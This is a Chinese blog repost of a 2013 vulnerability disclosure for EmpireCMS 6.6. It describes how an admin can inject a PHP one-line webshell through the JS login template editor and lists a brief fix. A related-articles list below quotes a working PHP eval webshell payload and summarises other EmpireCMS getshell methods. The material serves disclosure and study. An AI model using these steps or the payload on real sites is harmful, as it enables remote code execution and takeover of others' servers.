帝国 loginjs.php,帝国cms 6.6 后台拿shell

最新推荐文章于 2023-03-21 23:22:43 发布
最新推荐文章于 2023-03-21 23:22:43 发布
阅读量227 收藏
点赞数
文章标签: 帝国 loginjs.php

时间:2013-02-27来源:源码库 作者:源码库 文章热度:

漏洞作者: 付弘雪

提交时间: 2013-01-21

公开时间: 2013-01-21

漏洞类型: 文件上传导致任意代码执行

简要描述:

帝国cms 6.6版本后台拿shell 比网上流行的方法简单很多

由于 提交模版未过滤问题 导致的

详细说明:

后台-模版-公共模版-js调用登陆模版

此处功能为修改js调用登陆模板的样式

当点击修改的时候系统会把e\data\template\loginiframetemp.txt里面的内容连同修改框里面的内容一起写入e\member\login\loginjs.php

而且此处支持写入帝国cms的标签,也就是说可以写入php语句,所以在[!--empirenews.template--]

之前添加一句话([!--empirenews.template--]是判断登陆前后的系统标签,写到登陆前是因为省的到菜刀里面链接时候会提示未登录)

b25f3fa16b3929787cb0596f6f371279.png

插入之后在loginjs.php可以看到

82c88e9611ff183b116a4944a4f736e3.png

链接地址e/member/login/loginjs.php

漏洞证明:

948e3164b22a351b4c690a8e3711fc03.png

修复方案:

再提交的时候加入判断

过滤特殊函数

GarryTonon
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
帝国CMS7.5后台模板美化版V2.2.5
11-10
帝国CMS7.5后台模板美化版,一款帝国cms后台模板,帝国cms其实挺好的,只是那个后台,实在是不忍直视,没点功力的朋友看着都头大!这里给大家分享一款帝国CMS美化版的后台,非常的美观大气,重构界面,操作便捷一...
帝国CMS6.6升级到7.0常见问题汇总
09-29
以上问题的解决方案可以帮助用户顺利地从帝国CMS6.6升级到7.0。在升级过程中,建议做好数据库备份,以防止意外情况发生。同时,了解并熟悉系统的更新日志,有助于更好地理解新版本的变化,从而更有效地处理可能出现...
帝国6.5后台shell快速版
cnbird's blog
12-10 1258
帝国6.5后台shell快速版
帝国CMS后台getshell
qq_50854662的博客
04-02 664
后台新增页面,写入webshell <?php fputs(fopen("shell.php","a"),'<?php phpinfo();@eval($_POST[cmd]);?>')?> 在后台查看文件写入成功 访问成功 shell工具连接成功 ...
帝国备份王(Empirebak)拿webshell
weixin_34177064的博客
04-26 270
fhod 邪恶八进制帝国备份王(Empirebak)简介EmpireBak是一款完全免费、专门为Mysql大数据的备份与导入而设计的软件,系统采用分卷备份与导入,理论上可备份任何大小的数据库.可在 http://www.phome.net/ebak2008os/ 下载到默认账号密码为admin 123456登陆后先备份一次数据备份时可选择备份到的目录。。默认有个safemo...
EmpireCMS文件写入getshell
Zlirving_的博客
06-27 942
漏洞描述 Empirecms V6.5后台自定义页面处通过任意文件写入可getshell ①任意文件写入漏洞的原理通过提交数据,可以将任意的文件写入到网站中。 ②攻击者在获取到后台权限后,进行添加页面,添加成php页面,并且内容为一个PHP一句话木马,即可获得shell权限,威胁网站安全。   漏洞分析 //后台自定义斜页面写入文件的方法 WriteFiletext($path,$pagetext); ... function WriteFiletext($filepath,$string) {
帝国CMS中robots.txt文件用法
09-29
帝国CMS中,`robots.txt`主要用于保护后台管理目录和其他敏感数据。例如,`/e/class/`、`/e/data/`、`/e/enews/`和`/e/update/`通常是帝国CMS的系统文件或数据库相关目录,这些地方存储了网站的重要配置和用户数据...
简洁灰色的帝国CMS7.5后台登录模板.zip
03-10
帝国cms7.5简约大气后台登录界面模板,测试完整无错,兼容主流浏览器。 压缩包里面包含loginimg文件和index.php。把这些上传到后台目录下面(后台登录地址没有改过的话,默认是/e/admin/) 编码是utf-8,其他编码...
帝国CMS7.5后台改版.rar
02-28
帝国CMS7.5后台改版》是一款针对帝国CMS7.2版本的后台管理界面进行优化升级的资源包。此改版着重提升了系统的用户界面体验和功能布局,为管理员提供了更为舒适的操作环境。然而,值得注意的是,由于这次改版涉及到...
帝国 loginjs.php,帝国cms JS调用登陆模板制作教程
weixin_28819153的博客
03-12 634
帝国JS调用登陆模板为控制JS式调用会员状态的页面格式(/e/member/login/loginjs.php) 。本文将从JS调用登陆状态模板制作格式,JS调用登陆状态模板支持变量说明,如何修修改JS调用登陆状态模板,其他说明,四个部分来讲解,希望对您使用帝国cms制作模板有所帮助。JS调用登陆状态模板制作格式登陆前显示的内容[!--empirenews.template--]登陆后显示的内容J...
帝国php漏洞,EmpireCMS(帝国cms)csrf getshell
weixin_30564897的博客
03-18 531
漏洞作者: ../帝国cms默认添加栏目时候默认是允许投稿。另外帝国的会员中心基本都是开启的,有的就算不开启也是可以匿名投稿。漏洞证明:图1所示,帝国添加栏目时候默认是开启投稿的。图2所示,虽然过滤的,但是未过滤img中的污染数据。这个地方插入也就是http://127.0.0.1/1.js,1.js代码看这里 WooYun: 帝国CMS CSRF GetShell图3所示:管理员看到未审核内容时...
121.网络安全渗透测试—[CMS后台 getwebshell]—[帝国empirecms6.6后台 getwebshell]
qwsn
07-10 2163
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 登录后台---->栏目---->自定义页面---->增加自定义页面---->填写页面名称为webshell.php(随便)---->文件名默认是…/…/page.html---->文件内容为以下内容:功能是创建shell.php文件并写入一句话到shell.php文件中 栏目---->自定义页面---->管理自定义页面---->点击刚刚的page.html页面触发webshell(其实就是访问http://www.empirecm
帝国 loginjs.php,帝国CMS页面JS调用登录状态loginjs.php中获取会员头像的方法
weixin_29491635的博客
03-12 559
在用帝国CMS做网站的时候会在网站首页添加会员登录框,当用户登录完成后,会显示登录用户的信息,但是帝国CMS提供的loginjs.php文件中并没有调用会员头像的方法,下面主要为大家介绍在登录状态模板中调用会员头像的方法:首先打开文件:/e/member/login/loginjs.php,找到如下代码:$r=$empire->fetch1("select ".eReturnSelectMe...
帝国 loginjs.php,帝国CMS的安装方法
weixin_29624785的博客
03-12 179
怎么安装帝国CMS?下面本篇文章给大家介绍一下帝国CMS的安装方法。有一定的参考价值,有需要的朋友可以参考一下,希望对大家有所帮助。相关推荐:《帝国cms教程》帝国CMS的安装方法1、将帝国cms源码上传至域名空间,通过访问http://sbm-crusher.com/e/install/index.php 安装帝国cm2.我同意之后得到如下界面:没问题点击下一步3.这里需要设置目录权限,执行以...
帝国Cms7.5后台getshell | (CVE-2018-18086)漏洞复现
一醉一休的博客
09-13 3231
EmpireCMS帝国网站管理系统)是一套内容管理系统(`CMS`),EmpireCMS 7.5版本及之前版本在后台备份数据库时,未对数据库表名做验证,通过修改数据库表名可以`实现任意代码执行`,EmpireCMS7.5版本中的/e/class/moddofun.php文件的`LoadInMod函数`存在安全漏洞,攻击者可利用该漏洞上传任意文件,该漏洞编号为`CVE-2018-18086`
帝国cms首页页头实现注册登录功能
qq154080001的博客
06-21 405
在进行帝国模板开发过程,有时候我们需要在页面头部增加注册登录按钮,方便用户注册或者登录,那么如何实现这一功能呢?下面先看登录前后的演示图上图,是覃师宁博客《博客人生》演示站的头部登录前后样式,想要实现这一功能看,需要完成以下两部分的工作1.JS调用登录模板代码写法路径:后台--模板--公共模板--JS调用登录模板写入代码:<!-- 登陆前显示内容 --><form class="...
常见的CMS后台getshell姿势总结
最新发布
记录学习,一起进步
03-21 1308
WordPress,dedecms,aspcms,南方数据企业系统,phpmyadmin日志,pageadmin,无忧企业系统等CMS进行getshell
帝国CMS6.6采集教程:从入门到精通
教程以帝国CMS v6.6为例,适用于不同版本的帝国CMS。通过实例演示了从创建采集节点到设置正则表达式抓取网页内容的全过程,适合对帝国CMS采集功能不熟悉的用户学习。" 在帝国CMS中,采集功能是网站管理者快速获取和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值